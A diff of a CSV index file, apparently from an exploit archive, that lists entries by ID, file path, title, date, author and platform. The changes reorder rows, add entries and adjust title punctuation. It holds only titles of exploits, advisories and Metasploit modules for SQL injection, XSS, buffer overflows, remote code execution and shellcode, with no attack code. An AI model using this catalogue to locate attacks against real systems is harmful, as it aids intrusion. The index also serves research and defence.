+24116,platforms/windows/remote/24116.txt,"Internet Explorer 5_Firefox 0.8_OmniWeb 4.x URI Protocol Handler Arbitrary File Creation/Modification Vulnerability",2004-05-13,"Karol Wiesek",windows,remote,0 24117,platforms/windows/remote/24117.txt,"Microsoft Internet Explorer 6.0 Codebase Double Backslash Local Zone File Execution Weakness",2003-11-25,"Liu Die Yu",windows,remote,0 24118,platforms/windows/remote/24118.txt,"Microsoft Outlook Express 6.0 URI Obfuscation Vulnerability",2004-05-13,http-equiv,windows,remote,0 24119,platforms/windows/dos/24119.txt,"Microsoft Internet Explorer 5.0.1 http-equiv Meta Tag Denial of Service Vulnerability",2004-05-14,"Mike Mauler",windows,dos,0 @@ -21290,9 +21318,9 @@ id,file,description,date,author,platform,type,port 24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP Self-Executing Folder Vulnerability",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0 24126,platforms/php/webapps/24126.txt,"osCommerce 2.x File Manager Directory Traversal Vulnerability",2004-05-17,Rene,php,webapps,0 24127,platforms/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x Modpath Parameter Potential File Include Vulnerability",2004-05-17,waraxe,php,webapps,0 -24128,platforms/windows/dos/24128.txt,"ActivePerl 5.x,Cygwin 1.5.x System Function Call Buffer Overflow Vulnerability",2004-05-18,"Oliver Karow",windows,dos,0 +24128,platforms/windows/dos/24128.txt,"ActivePerl 5.x / Cygwin 1.5.x - System Function Call Buffer Overflow Vulnerability",2004-05-18,"Oliver Karow",windows,dos,0 24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPD 2.x/3.0 Get Request Buffer Overflow Vulnerability",2004-04-23,CoolICE,windows,remote,0 -24130,platforms/multiple/dos/24130.txt,"ActivePerl 5.x,Larry Wall Perl 5.x Duplication Operator Integer Overflow Vulnerability",2004-05-18,"Matt Murphy",multiple,dos,0 +24130,platforms/multiple/dos/24130.txt,"ActivePerl 5.x / Larry Wall Perl 5.x - Duplication Operator Integer Overflow Vulnerability",2004-05-18,"Matt Murphy",multiple,dos,0 24131,platforms/php/webapps/24131.txt,"dsm light Web file browser 2.0 - Directory Traversal Vulnerability",2004-05-18,Humberto,php,webapps,0 24133,platforms/windows/remote/24133.rb,"Freesshd Authentication Bypass",2013-01-15,metasploit,windows,remote,0 24134,platforms/php/webapps/24134.txt,"CMS snews SQL Injection Vulnerability",2013-01-15,"By onestree",php,webapps,0 @@ -21316,6 +21344,10 @@ id,file,description,date,author,platform,type,port 24152,platforms/php/webapps/24152.txt,"Land Down Under BBCode HTML Injection Vulnerability",2004-05-29,"Tim De Gier",php,webapps,0 24153,platforms/php/webapps/24153.txt,"e107 website system 0.6 usersettings.php avmsg Parameter XSS",2004-05-29,"Janek Vind",php,webapps,0 24154,platforms/php/webapps/24154.txt,"e107 website system 0.6 - ""email article to a friend"" Feature XSS",2004-05-29,"Janek Vind",php,webapps,0 +24186,platforms/php/webapps/24186.txt,"Invision Power Board 1.3 SSI.PHP SQL Injection Vulnerability",2004-06-11,JvdR,php,webapps,0 +24187,platforms/windows/remote/24187.txt,"Microsoft Internet Explorer 6.0 ADODB.Stream Object File Installation Weakness",2003-08-23,Jelmer,windows,remote,0 +24188,platforms/cgi/webapps/24188.pl,"Blackboard Learning System 6.0 Dropbox File Download Vulnerability",2004-06-10,"Maarten Verbeek",cgi,webapps,0 +24189,platforms/multiple/remote/24189.html,"Internet Explorer 5.0.1_Opera 7.51 URI Obfuscation Weakness",2004-06-10,http-equiv,multiple,remote,0 24157,platforms/php/webapps/24157.txt,"Cydia Repo Manager CSRF Vulnerability",2013-01-16,"Ramdan Yantu",php,webapps,0 24158,platforms/jsp/webapps/24158.txt,"Oracle Application Framework Diagnostic Mode Bypass Vulnerability",2013-01-16,"Trustwave's SpiderLabs",jsp,webapps,0 24159,platforms/linux/remote/24159.rb,"Nagios3 history.cgi Host Command Execution",2013-01-16,metasploit,linux,remote,0 @@ -21335,8 +21367,8 @@ id,file,description,date,author,platform,type,port 24173,platforms/php/local/24173.txt,"PHP 4.3.x Microsoft Windows Shell Escape Functions Command Execution Vulnerability",2004-06-07,"Daniel Fabian",php,local,0 24174,platforms/windows/remote/24174.txt,"Microsoft Internet Explorer 6.0 URL Local Resource Access Weakness",2004-06-06,"Rafel Ivgi The-Insider",windows,remote,0 24175,platforms/cgi/webapps/24175.txt,"Linksys Web Camera Software 2.10 Next_file Parameter File Disclosure Vulnerability",2004-06-07,"John Doe",cgi,webapps,0 -24176,platforms/php/webapps/24176.txt,"NetWin SurgeMail 1.8/1.9/2.0,WebMail 3.1 Error Message Path Disclosure",2004-06-07,"Donnie Werner",php,webapps,0 -24177,platforms/php/webapps/24177.txt,"NetWin SurgeMail 1.8/1.9/2.0,WebMail 3.1 Login Form XSS",2004-06-07,"Donnie Werner",php,webapps,0 +24176,platforms/php/webapps/24176.txt,"NetWin SurgeMail 1.8/1.9/2.0_WebMail 3.1 Error Message Path Disclosure",2004-06-07,"Donnie Werner",php,webapps,0 +24177,platforms/php/webapps/24177.txt,"NetWin SurgeMail 1.8/1.9/2.0_WebMail 3.1 Login Form XSS",2004-06-07,"Donnie Werner",php,webapps,0 24178,platforms/windows/dos/24178.txt,"ToCA Race Driver Multiple Remote Denial of Service Vulnerabilities",2004-06-08,"Luigi Auriemma",windows,dos,0 24179,platforms/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure Vulnerability",2004-06-08,"Vickenty Fesunov",linux,remote,0 24180,platforms/php/webapps/24180.txt,"Invision Gallery 2.0.5 - SQL Injection Vulnerability",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 @@ -21345,10 +21377,6 @@ id,file,description,date,author,platform,type,port 24183,platforms/php/webapps/24183.txt,"cPanel 5-9 Passwd Remote SQL Injection Vulnerability",2004-06-09,verb0s@virtualnova.net,php,webapps,0 24184,platforms/asp/webapps/24184.txt,"AspDotNetStorefront 3.3 Access Validation Vulnerability",2004-06-09,"Thomas Ryan",asp,webapps,0 24185,platforms/asp/webapps/24185.txt,"AspDotNetStorefront 3.3 ReturnURL Parameter Cross-Site Scripting Vulnerability",2004-06-09,"Thomas Ryan",asp,webapps,0 -24186,platforms/php/webapps/24186.txt,"Invision Power Board 1.3 SSI.PHP SQL Injection Vulnerability",2004-06-11,JvdR,php,webapps,0 -24187,platforms/windows/remote/24187.txt,"Microsoft Internet Explorer 6.0 ADODB.Stream Object File Installation Weakness",2003-08-23,Jelmer,windows,remote,0 -24188,platforms/cgi/webapps/24188.pl,"Blackboard Learning System 6.0 Dropbox File Download Vulnerability",2004-06-10,"Maarten Verbeek",cgi,webapps,0 -24189,platforms/multiple/remote/24189.html,"Internet Explorer 5.0.1,Opera 7.51 URI Obfuscation Weakness",2004-06-10,http-equiv,multiple,remote,0 24190,platforms/java/webapps/24190.txt,"PHP-Nuke 6.x/7.x FAQ Module categories Parameter XSS",2004-06-11,"Janek Vind",java,webapps,0 24191,platforms/php/webapps/24191.txt,"PHP-Nuke 6.x/7.x Encyclopedia Module Multiple Function XSS",2004-06-11,"Janek Vind",php,webapps,0 24192,platforms/php/webapps/24192.txt,"PHP-Nuke 6.x/7.x Reviews Module order Parameter SQL Injection",2004-06-11,"Janek Vind",php,webapps,0 @@ -21365,6 +21393,7 @@ id,file,description,date,author,platform,type,port 24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Root/SYSTEM Exploit",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 24205,platforms/linux/remote/24205.txt,"Novell NCP Pre-Auth Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0 +24230,platforms/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router SNMP Community String Information Disclosure Vulnerability",2004-06-22,"Konstantin V. Gavrilenko",hardware,remote,0 24206,platforms/multiple/remote/24206.rb,"Jenkins CI Script Console Command Execution MSF Module",2013-01-18,"Spencer McIntyre",multiple,remote,0 24207,platforms/windows/local/24207.c,"NVidia Display Driver Service (Nsvr) Exploit",2013-01-18,"Jon Bailey",windows,local,0 24208,platforms/windows/dos/24208.c,"FreeIPS 1.0 Protected Service Denial of Service Vulnerability",2004-06-14,shawnwebb@softhome.net,windows,dos,0 @@ -21381,15 +21410,14 @@ id,file,description,date,author,platform,type,port 24219,platforms/windows/remote/24219.txt,"IBM ACPRunner 1.2.5 - ActiveX Control Dangerous Method Vulnerability",2004-06-16,"eEye Digital Security Team",windows,remote,0 24220,platforms/windows/remote/24220.html,"IBM EGatherer 2.0 - ActiveX Control Dangerous Method Vulnerability",2004-06-01,"eEye Digital Security Team",windows,remote,0 24221,platforms/linux/remote/24221.pl,"Asterisk PBX 0.7.x - Multiple Logging Format String Vulnerabilities",2004-06-18,kfinisterre@secnetops.com,linux,remote,0 -24222,platforms/linux/dos/24222.c,"ircd-hybrid 7.0.1,ircd-ratbox 1.5.1/2.0 - Socket Dequeuing Denial of Service Vulnerability",2004-06-19,"Erik Sperling Johansen",linux,dos,0 +24222,platforms/linux/dos/24222.c,"ircd-hybrid 7.0.1_ircd-ratbox 1.5.1/2.0 - Socket Dequeuing Denial of Service Vulnerability",2004-06-19,"Erik Sperling Johansen",linux,dos,0 24223,platforms/linux/remote/24223.py,"Rlpr 2.0 msg() Function Multiple Vulnerabilities",2004-06-19,jaguar@felinemenace.org,linux,remote,0 24224,platforms/multiple/remote/24224.c,"TildeSlash Monit 1-4 - Authentication Handling Buffer Overflow Vulnerability",2004-06-04,"Nilanjan De",multiple,remote,0 24225,platforms/php/webapps/24225.php,"osTicket STS 1.2 Attachment Remote Command Execution Vulnerability",2004-06-21,"Guy Pearce",php,webapps,0 -24226,platforms/hardware/remote/24226.txt,"D-Link AirPlus DI-614+, DI-624, DI-704 DHCP Log HTML Injection Vulnerability",2004-06-21,c3rb3r,hardware,remote,0 +24226,platforms/hardware/remote/24226.txt,"D-Link AirPlus DI-614+_ DI-624_ DI-704 DHCP Log HTML Injection Vulnerability",2004-06-21,c3rb3r,hardware,remote,0 24227,platforms/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection Vulnerability",2004-06-21,"Luca Legato",php,webapps,0 24228,platforms/php/webapps/24228.txt,"Joomla com_collector Component Arbitrary File Upload Vulnerability",2013-01-19,"Red Dragon_al",php,webapps,0 24229,platforms/php/webapps/24229.txt,"Wordpress plugin Ripe HD FLV Player SQL Injection Vulnerability",2013-01-19,Zikou-16,php,webapps,0 -24230,platforms/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router SNMP Community String Information Disclosure Vulnerability",2004-06-22,"Konstantin V. Gavrilenko",hardware,remote,0 24231,platforms/php/webapps/24231.txt,"ArbitroWeb PHP Proxy 0.5/0.6 - Cross-Site Scripting Vulnerability",2004-06-22,"Josh Gilmour",php,webapps,0 24232,platforms/php/webapps/24232.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - Multiple Vulnerabilities",2004-06-23,"Janek Vind",php,webapps,0 24233,platforms/freebsd/dos/24233.c,"FreeBSD 4.10/5.x - execve() Unaligned Memory Access Denial of Service Vulnerability",2004-06-23,"Marceta Milos",freebsd,dos,0 @@ -21418,7 +21446,7 @@ id,file,description,date,author,platform,type,port 24256,platforms/php/webapps/24256.php,"JAWS 0.2/0.3 Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0 24257,platforms/php/webapps/24257.txt,"JAWS 0.2/0.3 index.php action Parameter XSS",2004-07-06,"Fernando Quintero",php,webapps,0 24258,platforms/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Local Privilege Escalation Vulnerability",2013-01-20,LiquidWorm,windows,local,0 -24259,platforms/linux/remote/24259.c,"Ethereal 0.x - Multiple Unspecified iSNS, SMB and SNMP Protocol Dissector Vulnerabilities",2004-08-05,"Rmi Denis-Courmont",linux,remote,0 +24259,platforms/linux/remote/24259.c,"Ethereal 0.x - Multiple Unspecified iSNS_ SMB and SNMP Protocol Dissector Vulnerabilities",2004-08-05,"Rémi Denis-Courmont",linux,remote,0 24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0 24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 comersus_message.asp XSS",2004-07-07,"Thomas Ryan",asp,webapps,0 24262,platforms/windows/remote/24262.html,"Opera Web Browser 7.5x IFrame OnLoad Address Bar URL Obfuscation Weakness",2004-07-08,"bitlance winter",windows,remote,0 @@ -21428,8 +21456,9 @@ id,file,description,date,author,platform,type,port 24266,platforms/windows/remote/24266.txt,"Microsoft Internet Explorer 5.0.1 Popup.show Mouse Event Hijacking Vulnerability",2004-07-12,Paul,windows,remote,0 24267,platforms/windows/dos/24267.txt,"Microsoft Internet Explorer 6.0 JavaScript Null Pointer Exception Denial of Service Vulnerability",2004-07-12,"Berend-Jan Wever",windows,dos,0 24268,platforms/multiple/remote/24268.txt,"Code-Crafters Ability Mail Server 1.18 errormsg Parameter XSS",2004-07-12,dr_insane,multiple,remote,0 -24269,platforms/php/webapps/24269.txt,"NConf 1.3 (detail.php detail_admin_items.php, id parameter) SQL Injection",2013-01-21,haidao,php,webapps,0 +24269,platforms/php/webapps/24269.txt,"NConf 1.3 (detail.php detail_admin_items.php id parameter) SQL Injection",2013-01-21,haidao,php,webapps,0 24270,platforms/php/webapps/24270.txt,"NConf 1.3 - Arbitrary File Creation",2013-01-21,haidao,php,webapps,0 +24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 Blog_Exec.PHP Cross-Site Scripting Vulnerability",2004-08-07,"befcake beefy",php,webapps,0 24272,platforms/multiple/remote/24272.rb,"Jenkins Script-Console Java Execution",2013-01-21,metasploit,multiple,remote,0 24273,platforms/php/remote/24273.rb,"PHP-Charts 1.0 - PHP Code Execution Vulnerability",2013-01-21,metasploit,php,remote,0 24274,platforms/php/webapps/24274.pl,"phpBB 2.0.x Viewtopic.PHP PHP Script Injection Vulnerability",2004-07-12,"sasan hezarkhani",php,webapps,0 @@ -21454,7 +21483,8 @@ id,file,description,date,author,platform,type,port 24293,platforms/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local,0 24294,platforms/php/webapps/24294.txt,"Wordpress Developer Formatter CSRF Vulnerability",2013-01-22,"Junaid Hussain",php,webapps,0 24295,platforms/php/webapps/24295.txt,"Adult Webmaster Script Password Disclosure Vulnerability",2013-01-22,"Dshellnoi Unix",php,webapps,0 -24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0,Blog:CMS 3,PunBB 1.x Common.PHP Remote File Include Vulnerability",2004-07-20,"Radek Hulan",php,webapps,0 +24356,platforms/php/webapps/24356.txt,"Moodle 1.x - 'post.php' Cross-Site Scripting Vulnerability",2004-08-16,"Javier Ubilla",php,webapps,0 +24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0_Blog:CMS 3_PunBB 1.x Common.PHP Remote File Include Vulnerability",2004-07-20,"Radek Hulan",php,webapps,0 24297,platforms/windows/remote/24297.pl,"Serena TeamTrack 6.1.1 - Remote Authentication Bypass Vulnerability",2004-07-21,"Noam Rathaus",windows,remote,0 24298,platforms/asp/webapps/24298.pl,"Internet Software Sciences Web+Center 4.0.1 Cookie Object SQL Injection Vulnerability",2004-07-21,"Noam Rathaus",asp,webapps,0 24299,platforms/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script SQL Injection Vulnerability",2004-07-21,"Noam Rathaus",asp,webapps,0 @@ -21479,7 +21509,7 @@ id,file,description,date,author,platform,type,port 24318,platforms/windows/shellcode/24318.c,"Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0 24319,platforms/windows/dos/24319.txt,"Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite",2013-01-24,shinnai,windows,dos,0 24320,platforms/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection Vulnerability",2013-01-24,RealGame,multiple,webapps,0 -24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0 +24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0 24322,platforms/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload",2013-01-24,metasploit,multiple,remote,0 24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 - Buffer Overflow",2013-01-24,metasploit,multiple,remote,0 24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module Cross-Site Scripting Vulnerability",2004-07-26,DarkBicho,php,webapps,0 @@ -21493,12 +21523,12 @@ id,file,description,date,author,platform,type,port 24332,platforms/php/webapps/24332.txt,"Comersus Cart 5.0 - SQL Injection Vulnerability",2004-07-29,evol@ruiner.halo.nu,php,webapps,0 24333,platforms/php/webapps/24333.txt,"Verylost LostBook 1.1 Message Entry HTML Injection Vulnerability",2004-07-29,"Joseph Moniz",php,webapps,0 24334,platforms/php/webapps/24334.txt,"JAWS 0.2/0.3/0.4 ControlPanel.PHP SQL Injection Vulnerability",2004-07-29,"Fernando Quintero",php,webapps,0 -24335,platforms/unix/local/24335.txt,"Oracle9i Database Default Library Directory Privilege Escalation Vulnerability",2004-07-30,"Juan Manuel Pascual Escribá",unix,local,0 +24335,platforms/unix/local/24335.txt,"Oracle9i Database Default Library Directory Privilege Escalation Vulnerability",2004-07-30,"Juan Manuel Pascual Escribá",unix,local,0 24336,platforms/cgi/remote/24336.txt,"myServer 0.6.2 math_sum.mscgi Multiple Parameter XSS",2004-07-30,dr_insane,cgi,remote,0 24337,platforms/cgi/remote/24337.txt,"myServer 0.6.2 math_sum.mscgi Multiple Parameter Remote Overflow",2004-07-30,dr_insane,cgi,remote,0 24338,platforms/linux/remote/24338.c,"Citadel/UX 5.9/6.x Username Buffer Overflow Vulnerability (1)",2004-07-30,CoKi,linux,remote,0 24339,platforms/linux/remote/24339.c,"Citadel/UX 5.9/6.x Username Buffer Overflow Vulnerability (2)",2004-07-30,Nebunu,linux,remote,0 -24340,platforms/php/webapps/24340.txt,"PowerPortal 1.1/1.3 Private Message HTML Injection Vulnerability",2004-07-30,vampz,php,webapps,0 +24340,platforms/php/webapps/24340.txt,"PowerPortal 1.1/1.3 - Private Message HTML Injection Vulnerability",2004-07-30,vampz,php,webapps,0 24341,platforms/php/webapps/24341.txt,"FusionPHP Fusion News 3.3/3.6 Administrator Command Execution Vulnerability",2004-07-30,"Joseph Moniz",php,webapps,0 24342,platforms/cgi/remote/24342.txt,"Webcam Corp Webcam Watchdog 4.0.1 sresult.exe Cross-Site Scripting Vulnerability",2004-08-02,dr_insane,cgi,remote,0 24343,platforms/windows/dos/24343.txt,"MailEnable 1.1x Content-Length Denial of Service Vulnerability",2004-07-30,CoolICE,windows,dos,0 @@ -21514,8 +21544,6 @@ id,file,description,date,author,platform,type,port 24353,platforms/unix/remote/24353.sql,"Oracle 9i Multiple Unspecified Vulnerabilities",2004-08-04,"Marco Ivaldi",unix,remote,0 24354,platforms/windows/remote/24354.txt,"Microsoft Internet Explorer 6.0 mms Protocol Handler Executable Command Line Injection Vulnerability",2004-08-05,"Nicolas Robillard",windows,remote,0 24355,platforms/linux/dos/24355.txt,"GNU Info 4.7 Follow XRef Buffer Overrun Vulnerability",2004-08-06,"Josh Martin",linux,dos,0 -24356,platforms/php/webapps/24356.txt,"Moodle 1.x - 'post.php' Cross-Site Scripting Vulnerability",2004-08-16,"Javier Ubilla",php,webapps,0 -24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 Blog_Exec.PHP Cross-Site Scripting Vulnerability",2004-08-07,"befcake beefy",php,webapps,0 24358,platforms/linux/dos/24358.txt,"Xine-Lib 0.99 - Remote Buffer Overflow Vulnerability",2004-07-08,c0ntex,linux,dos,0 24359,platforms/php/webapps/24359.php,"YaPiG 0.92 - Remote Server-Side Script Execution Vulnerability",2004-07-07,aCiDBiTS,php,webapps,0 24360,platforms/linux/dos/24360.py,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun Vulnerability (1)",2004-08-09,"Juan Pablo Martinez Kuhn",linux,dos,0 @@ -21553,15 +21581,15 @@ id,file,description,date,author,platform,type,port 24392,platforms/php/webapps/24392.php,"Mantis 0.x New Account Signup Mass Emailing Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0 24393,platforms/php/webapps/24393.txt,"MyDms 1.4 - SQL Injection Vulnerability And Directory Traversal Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0 24394,platforms/multiple/dos/24394.txt,"Opera Web Browser 7.23 JavaScript Denial of Service Vulnerability",2004-08-21,sourvivor,multiple,dos,0 -24395,platforms/windows/dos/24395.txt,"Internet Explorer 6.0,Firefox 0.8/0.9.x JavaScript Denial of Service Vulnerability",2004-08-23,MeFakon,windows,dos,0 +24395,platforms/windows/dos/24395.txt,"Internet Explorer 6.0_Firefox 0.8/0.9.x JavaScript Denial of Service Vulnerability",2004-08-23,MeFakon,windows,dos,0 24396,platforms/php/webapps/24396.txt,"JShop E-Commerce Suite 3.0 - Page.PHP Cross-Site Scripting Vulnerability",2004-08-23,"Dr Ponidi Haryanto",php,webapps,0 24397,platforms/asp/webapps/24397.txt,"Compulsive Media CNU5 News.mdb Database Disclosure Vulnerability",2004-08-23,"Security .Net Information",asp,webapps,0 24398,platforms/linux/local/24398.sh,"IMWheel 1.0 Predictable Temporary File Creation Vulnerability",2004-08-23,I)ruid,linux,local,0 24399,platforms/php/webapps/24399.txt,"PhotoADay Pad_selected Parameter Cross-Site Scripting Vulnerability",2004-08-23,"King Of Love",php,webapps,0 24400,platforms/cgi/webapps/24400.txt,"Axis Network Camera 2.x And Video Server 1-3 - virtualinput.cgi Arbitrary Command Execution",2004-08-23,bashis,cgi,webapps,0 +24403,platforms/php/webapps/24403.txt,"EGroupWare 1.0 Calendar Module date Parameter XSS",2004-08-23,"Joxean Koret",php,webapps,0 24401,platforms/cgi/webapps/24401.txt,"Axis Network Camera 2.x And Video Server 1-3 - Directory Traversal Vulnerability",2004-08-23,bashis,cgi,webapps,0 24402,platforms/cgi/webapps/24402.php,"Axis Network Camera 2.x And Video Server 1-3 - HTTP Authentication Bypass",2004-08-23,bashis,cgi,webapps,0 -24403,platforms/php/webapps/24403.txt,"EGroupWare 1.0 Calendar Module date Parameter XSS",2004-08-23,"Joxean Koret",php,webapps,0 24404,platforms/windows/remote/24404.txt,"Gadu-Gadu 6.0 File Download Filename Obfuscation Weakness",2004-08-23,"Bartosz Kwitkowski",windows,remote,0 24405,platforms/php/webapps/24405.txt,"SWsoft Plesk Reloaded 7.1 - Login_name Parameter Cross-Site Scripting Vulnerability",2004-08-24,sourvivor,php,webapps,0 24406,platforms/linux/local/24406.txt,"GNU a2ps 4.13 File Name Command Execution Vulnerability",2004-08-24,"Rudolf Polzer",linux,local,0 @@ -21571,7 +21599,7 @@ id,file,description,date,author,platform,type,port 24410,platforms/php/webapps/24410.txt,"PHP Code Snippet Library 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-24,"Nikyt0x Argentina",php,webapps,0 24411,platforms/windows/local/24411.c,"Sysinternals Regmon 6.11 - Local Denial of Service Vulnerability",2004-08-25,"Next Generation Security",windows,local,0 24412,platforms/windows/dos/24412.c,"RealVNC Server 4.0 - Remote Denial of Service Vulnerability",2004-08-25,Uz4yh4N,windows,dos,0 -24413,platforms/windows/remote/24413.txt,"NullSoft Winamp 2-5 - (.wsz) Remote Code Execution Vulnerability",2004-07-26,anonymous,windows,remote,0 +24413,platforms/windows/remote/24413.txt,"NullSoft Winamp 2-5 - (.wsz) Remote Code Execution Vulnerability",2004-07-26,anonymous,windows,remote,0 24414,platforms/multiple/remote/24414.txt,"keene digital media server 1.0.2 - Directory Traversal variant Vulnerability",2004-08-26,"GulfTech Security",multiple,remote,0 24415,platforms/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Vulnerabilities",2004-08-28,CyruxNET,php,webapps,0 24416,platforms/windows/remote/24416.txt,"Ipswitch WS_FTP Server 5.0.x CD Command Malformed File Path Remote Denial of Service Vulnerability",2004-08-30,lion,windows,remote,0 @@ -21586,14 +21614,16 @@ id,file,description,date,author,platform,type,port 24425,platforms/php/webapps/24425.txt,"phpWebsite 0.7.3/0.8.x/0.9.x Comment Module CM_pid XSS",2004-09-01,"GulfTech Security",php,webapps,0 24426,platforms/windows/dos/24426.html,"Opera Web Browser 7.23 Empty Embedded Object JavaScript Denial of Service Vulnerability",2004-09-01,Stevo,windows,dos,0 24432,platforms/windows/webapps/24432.txt,"Internet Explorer 8 & Internet Explorer 9 - Steal any Cookie",2013-01-28,"Christian Haider",windows,webapps,0 +24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 +24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals (gallery.php L param) - SQL Injection Vulnerability",2013-02-17,3spi0n,php,webapps,0 24433,platforms/php/webapps/24433.txt,"php weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 +24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-06,metasploit,windows,remote,0 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails JSON Processor YAML Deserialization Code Execution",2013-01-29,metasploit,multiple,remote,0 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0 24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal Vulnerability",2013-01-29,Vulnerability-Lab,php,webapps,0 24437,platforms/windows/dos/24437.py,"Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read",2013-01-29,"Debasish Mandal",windows,dos,0 24438,platforms/php/webapps/24438.txt,"DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability",2013-01-28,EgiX,php,webapps,0 24439,platforms/freebsd/webapps/24439.txt,"PFsense UTM Platform 2.0.1 - XSS Vulnerability",2013-01-29,"Dimitris Strevinas",freebsd,webapps,0 -24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 24442,platforms/hardware/webapps/24442.txt,"D-Link DCS Cameras - Multiple Vulnerabilities",2013-01-31,"Roberto Paleari",hardware,webapps,0 24443,platforms/hardware/webapps/24443.txt,"Buffalo TeraStation TS-Series - Multiple Vulnerabilities",2013-01-31,"Andrea Fabrizi",hardware,webapps,0 24444,platforms/php/remote/24444.rb,"DataLife Engine preview.php PHP Code Injection",2013-02-01,metasploit,php,remote,0 @@ -21602,7 +21632,7 @@ id,file,description,date,author,platform,type,port 24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0 24450,platforms/freebsd/dos/24450.txt,"FreeBSD 9.1 ftpd Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos,0 24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0 -24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 (config.php, question parameter) SQL Injection Vulnerability",2013-02-05,kallimero,php,webapps,0 +24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - (config.php question parameter) SQL Injection Vulnerability",2013-02-05,kallimero,php,webapps,0 24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 and DIR-300 (rev B) Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0 24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0 24455,platforms/unix/remote/24455.rb,"Portable UPnP SDK unique_service_name() Remote Code Execution",2013-02-05,metasploit,unix,remote,0 @@ -21610,7 +21640,6 @@ id,file,description,date,author,platform,type,port 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection Vulnerability",2013-02-05,AkaStep,php,webapps,0 24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0 24459,platforms/linux/dos/24459.sh,"Linux Kernel - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,dos,0 -24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-06,metasploit,windows,remote,0 24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-12,metasploit,windows,remote,0 24462,platforms/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0 24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0 @@ -21619,8 +21648,11 @@ id,file,description,date,author,platform,type,port 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple 